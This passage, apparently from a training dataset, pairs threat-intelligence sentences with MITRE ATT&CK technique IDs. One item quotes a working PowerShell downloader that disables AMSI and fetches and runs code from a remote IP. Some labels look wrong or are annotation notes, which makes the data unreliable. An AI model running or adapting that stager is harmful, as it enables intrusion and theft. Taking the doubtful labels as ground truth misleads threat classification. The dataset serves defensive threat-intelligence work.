the target computer.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM can obtain information about security software on the victim.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over C2 Channel or Exfiltration Over Alternative Protocol.### Assistant: T1029: Scheduled Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PUNCHBUGGY has saved information to a random temp file before exfil.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used tools capable of stealing contents of the clipboard.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Janicab captured screenshots and sent them out to a C2 server.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MURKYTOP has the capability to retrieve information about users on remote hosts.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has used Hermes ransomware to encrypt files with AES256.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has collected browser bookmark information to learn more about compromised hosts, obtain personal information about users, and acquire details about internal network resources.### Assistant: T1217: Browser Bookmark Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif has used Registry modifications as part of its installation routine.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Personas may exist on a single site or across multiple sites .### Assistant: T1586: Compromise Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX/Shlayer executes a .command script from a hidden directory in a mounted DMG.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WHOIS data is stored by regional Internet registries responsible for allocating and assigning Internet resources such as domain names.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Encoded Payload Decoded Payload MD5 Size Import Hash Exported Function Version aa3f303c3319b14b4829fe2faa5999c1 322164 182ee99b4f0803628c30411b1faa9992 l7MF25T96n45qOGWX 5.3.2 126067d634d94c45084cbe1d9873d895 330804 5f45532f947501cf024d84c36e3a19a1 hJvTJcdAU3mNkuvGGq7L 5.4.1 fce54b4886cac5c61eda1e7605483ca3 345812 c1942a0ca397b627019dace26eca78d8 WcuH 5.4.1 Table 2: Static characteristics of UPPERCUT Another new feature in the latest UPPERCUT sample is that the malware sends an error code in the Cookie header if it fails to receive the HTTP response from the command and control (C2) server### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.### Assistant: T1485: Data Destruction" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gold Dragon checks the running processes on the victim’s machine.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On embedded devices, downgrading the version typically only requires replacing the operating system file in storage.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Internal spearphishing is multi-staged attack where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user.### Assistant: T1534: Internal Spearphishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor has manipulated the time of last access to files and registry keys after they have been created or modified.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has searched for unsecured SSH keys.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cardinal RAT sets HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load to point to its executable.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT37's has added persistence via the Registry key HKCU\Software\Microsoft\CurrentVersion\Run\.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can use stolen session cookies to authenticate to web applications and services.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak has the ability to modify the Registry key HKCU\Software\ApplicationContainer\Appsw64 to store information regarding the C2 server and downloads.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZIRCONIUM has used multi-stage packers for exploit code.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil can mark its binary code for deletion after reboot.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Examples of existing defenses that can be impeded include encryption, via Weaken Encryption, authentication, via Network Device Authentication, and perimeter defenses, via Network Boundary Bridging.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Its purpose is to load Msadoz.dll in order to decrypt and execute it in memory### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GreyEnergy encrypts communications using AES256.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX/Shlayer can download payloads, and extract bytes from files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RainyDay can decrypt its payload via a XOR key.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HighShell v5.0 explorer tab allows actor to navigate the file system The HighShell v7.1 variant from the data dump contains similar functionality to its predecessors and continued the tabular approach but expanded even further by splitting out the main functionality across multiple tabs, specifically “Command”, “Explorer”, “Upload”, “Download”, “Sql Server” and “Change Time”### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network### Assistant: T1011: Exfiltration Over Other Network Medium" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Peppy can identify specific files for exfiltration.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information.### Assistant: T1213: Data from Information Repositories" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FinFisher establishes persistence by creating the Registry key HKCU\Software\Microsoft\Windows\Run.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment.### Assistant: T1612: Build Image on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operators deploying Netwalker have used batch scripts to retrieve the Netwalker payload.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AuditCred encrypts the configuration.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Links may also direct users to malicious applications designed to Steal Application Access Tokens, like OAuth tokens, in order to gain access to protected applications and information.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SodaMaster can check for the presence of the Registry key HKEY_CLASSES_ROOT\\Applications\\VMwareHostOpen.exe before proceeding to its main functionality.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They have also dumped credentials from domain controllers.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LoudMiner harvested system resources to mine cryptocurrency, using XMRig to mine Monero.### Assistant: T1496: Resource Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework., /etc/passwd ### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 modified legitimate Windows services to install malware backdoors.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Modifications to domain settings may include altering domain Group Policy Objects or changing trust settings for domains, including federation trusts.### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DDKONG uses Rundll32 to ensure only a single instance of itself is running at once.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group has developed several custom malware for use in operations.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gathering this information may reveal opportunities for other forms of reconnaissance or Search Open Websites/Domains, establishing operational resources or Compromise Accounts, and/or initial access .### Assistant: T1591: Gather Victim Org Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LightNeuron can be configured to automatically exfiltrate files under a specified directory.### Assistant: T1020: Automated Exfiltration" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LTD. Stuxnet used a digitally signed driver with a compromised Realtek certificate.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete collects the MAC address of the target computer and other network configuration information.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,As of macOS Sierra, the sudoers file has tty_tickets enabled by default.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Use of multiple stages may obfuscate the command and control channel to make detection more difficult.### Assistant: T1104: Multi-Stage Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,down_new has the ability to gather information on installed applications.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Taidoor has relied upon a victim to click on a malicious email attachment.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group malware IndiaIndia obtains and sends to its C2 server information about the first network interface card’s configuration, including IP address, gateways, subnet mask, DHCP information, and whether WINS is available.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Any user or administrator within the organization can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT has called cmd through a Word document macro.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additional information In the advanced stages of this research, we were able not only to observe additional files and tools from the attackers’ arsenal but also some OPSEC mistakes made by the attackers### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NOKKI has downloaded a remote module for execution.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Other malware has obtained the OS version, UUID, and computer/host name to send to the C2 server.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges. . Exaramel for Linux has a hardcoded location that it uses to achieve persistence if the startup system is Upstart or System V and it is running as root.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proton kills security tools like Wireshark that are running.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crutch has conducted C2 communications with a Dropbox account using the HTTP API.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This action is repeated until the dwell time value is bigger or equal to the dwell time value for the standby mode### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Elise enumerates processes via the tasklist command.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious files will be transmitted directly as attachments or through links to download them.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windows Transactional NTFS was introduced in Vista as a method to perform safe file operations.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWRUNER persists through a scheduled task that executes it every minute.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This script relays commands and output between the controller and the system### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StrongPity can add directories used by the malware to the Windows Defender exclusions list to prevent detection.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Unlike a previously reported variant, this version of BADNEWS no longer looks at USB drives for interesting files### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Placing a program within a startup folder will also cause that program to execute when a user logs in.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BadPatch stores collected data in log files before exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GrimAgent can use an AES key to encrypt C2 communications.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bankshot collects files from the local system.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has collected files from network shared drives.### Assistant: T1039: Data from Network Shared Drive" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ChinaChopper web shell### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pysa has the functionality to delete shadow copies.### Assistant: T1490: Inhibit System Recovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group has renamed the TAINTEDSCRIBE main executable to disguise itself as Microsoft's narrator.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Olympic Destroyer uses the API call ChangeServiceConfigW to disable all services on the affected system.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot establishes persistence by creating an autostart service that allows it to run whenever the machine boots.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carberp has removed various hooks before installing the trojan or bootkit to evade sandbox analysis or other analysis software.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound granted compromised email accounts read access to the email boxes of additional targeted accounts.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may transfer tools or other files from an external system into a compromised environment.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Darkhotel malware can obtain system time from a compromised host.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The PowerShell command decodes to the following:$command = 'WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKACAAIAAgACAAdAByAHkAewAgAAoAIAAgACAAIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgAgACAAIAAgAH0AYwBhAHQAYwBoAHsAfQAKACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAzADkALgA1ADkALgA0ADYALgAxADUANAA6ADMANAA4ADUALwBJAE0AbwA4AG8AbwBzAGkAZQBWAGEAaQAnACkAOwAKACAAIAAgACAA' if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64') { $exec = $Env:windir + '\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -exec bypass -window hidden -noni -nop -encoded ' + $command IEX $exec } else { $exec = [System.Convert]::FromBase64String($command) $exec = [Text.Encoding]::Unicode.GetString($exec) IEX $exec }The script above checks the system architecture to determine if it is an x64 machine and attempts to execute a base64 encoded command that decodes to the following:[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; try{ [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) }catch{} IEX (New-Object Net.WebClient).DownloadString('http:// 139.59.46[.]154:3485 /IMo8oosieVai');This decoded PowerShell script attempts to download and execute a file using HTTP from the URL “hxxp:// 139.59.46[.]154:3485 /IMo8oosieVai”### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has executed a variety of PowerShell scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used Remote Desktop Protocol for lateral movement.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zeus Panda modifies several Registry keys under HKCU\Software\Microsoft\Internet Explorer\ PhishingFilter\ to disable phishing filters.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has used a tool to query Active Directory using LDAP, discovering information about usernames listed in AD.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,As part of the anti-debugging or anti-monitoring techniques, ShellTea iterates over all the running processes, applies CRC32 on each process name (after converting the string to capital letters), and then compares the value against a predefined set of CRCs.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windigo has used a script to detect installed software on targeted systems.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dtrack can collect the host's IP addresses using the ipconfig command.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis.### Assistant: T1207: Rogue Domain Controller" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group malware has collected Microsoft Office documents from mapped network drives.### Assistant: T1039: Data from Network Shared Drive" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kerrdown can use a VBS base64 decoder function published by Motobit.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use commands such as gpresult or various publicly available PowerShell functions, such as Get-DomainGPO and Get-DomainGPOLocalGroup, to gather information on Group Policy settings.### Assistant: T1615: Group Policy Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Raindrop was installed under names that resembled legitimate Windows file and directory names.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldenSpy has used the Ryeol HTTP Client to facilitate HTTP internet communication.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Masquerading may increase the chance of users mistakenly executing these files.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,COM + hijack in same sentence### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TYPEFRAME can uninstall malware components using a batch script.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbanak checks the Registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings for proxy configurations information.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SpicyOmelette has been signed with valid digital certificates.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 includes garbage code to mislead anti-malware software and researchers.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has used tools like Adfind to query users, groups, organizational units, and trusts.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Initial Compromise For initial compromise, FireEye Intelligence has observed APT39 leverage spear phishing emails with malicious attachments and/or hyperlinks typically resulting in a POWBAT infection### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather credentials via APIs within a containers environment.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has specifically targeted government agency employees with spearphishing e-mails.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may establish persistence through executing malicious commands triggered by a user’s shell.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT18 obfuscates strings in the payload.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used compromised domain accounts to gain access to the target environment.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ISMInjector hollows out a newly created process RegASM.exe and injects its payload into the hollowed process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has obtained the password for the victim's password manager via a custom keylogger.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Trojan uses the first four bytes of this hardware ID as a unique identifier for the system, which in our case was “0000”### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has injected malicious DLLs into memory with read, write, and execute permissions.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bandook can collect information about the drives available on the system.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork has signed malware with self-signed certificates from fictitious and spoofed legitimate software companies.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some malware targets the termination of a program to trigger execution, adversaries can use the ~/.bash_logout file to execute malicious commands at the end of a session.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLUELIGHT has a XOR-encoded payload.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Otherwise, the Trojan will attempt to parse the response for a command, specifically by splitting the decode response on <> and treating the text to the left of the <> string as the command the text to the right as the command arguments### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Denis has a command to delete files from the victim’s machine.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dtrack’s dropper can list all running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carberp can start a remote VNC session by downloading a new plugin.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may modify XDG autostart entries to execute programs or commands during system boot.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also compile WMI scripts into Windows Management Object files that can be used to create a malicious subscription.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AuditCred uses XOR and RC4 to perform decryption on the code functions.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has intentionally deleted computer files to cover their tracks, including with use of the program CCleaner.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Service principal names are used to uniquely identify each instance of a Windows service.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Smart, optimized, and connected, XGen security powers Trend Micro’s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 used AUDITPOL to prevent the collection of audit logs.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Access is usually obtained through compromising accounts used to manage cloud infrastructure.### Assistant: T1535: Unused/Unsupported Cloud Regions" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Whitefly has used malicious .exe or .dll files disguised as documents or images.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group malware SierraAlfa accesses the ADMIN$ share via SMB to conduct lateral movement.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay can use the Windows COM API to schedule tasks and maintain persistence.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may target user email on local systems to collect sensitive information.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has exfiltrated data over its C2 channel.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They may also be found as parameters to deployment commands in container logs.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group has used the command cmstp.exe /s /ns C:\Users\ADMINI~W\AppData\Local\Temp\XKNqbpzl.txt to bypass AppLocker and launch a malicious script.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rancor launched a scheduled task to gain persistence using the schtasks /create /sc command.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ixeshe can list running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has utilized tools to capture mouse movements.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CoinTicker executes a bash script to establish a reverse shell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PUNCHBUGGY can load a DLL using Rundll32.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor has a file uploader plugin that automatically exfiltrates the collected data and log files to the C2 server.### Assistant: T1020: Automated Exfiltration" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 will identify Microsoft Office documents on the victim's computer.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR /NBT-NS traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ServHelper can execute shell commands against cmd.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ServHelper uses HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,* In some cases a second visit to the website after the initial scan is required before exploit code is delivered.### Assistant: 